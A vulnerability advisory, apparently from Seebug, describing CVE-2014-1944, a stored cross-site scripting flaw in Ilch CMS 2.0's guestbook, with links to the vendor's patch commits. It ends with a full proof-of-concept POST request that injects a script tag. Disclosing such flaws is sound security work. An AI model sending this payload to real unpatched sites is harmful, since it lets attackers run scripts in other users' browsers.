Ilch CMS跨站脚本漏洞

2014-03-10T00:00:00
ID SSV:61716
Type seebug
Reporter Root
Modified 2014-03-10T00:00:00

Description

CVE ID:CVE-2014-1944

Ilch CMS是一款内容管理系统。

由于传递到“/index.php/guestbook/index/newentry”URL的“text”的HTTP POST参数的用户数据没有充分过滤。远程未经认证的用户可以发送特制的HTTP POST请求,允许永久注入并执行任意HTML和脚本代码。 0 Ilch CMS 2.0 厂商补丁:

Ilch CMS

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://github.com/IlchCMS/Ilch-2.0/commit/381e15f39d07d3cdf6aaaa25c0f2321f817935f7 https://github.com/IlchCMS/Ilch-2.0/commit/02bb4953c0e21cb8f20e5e91db5e15a77fe1a5ce

                                        
                                            
                                                The exploitation example below uses the JavaScript "alert()" function to display "immuniweb" word:


POST /index.php/guestbook/index/newentry HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 151

ilch_token=5a528778359d4756b9b8803b48fba18b&name=name&email=email%40email.com&homepage=http%3A%2F%2Fsite.com&text=<script>alert('immuniwweb');</script>&saveEntry=Submit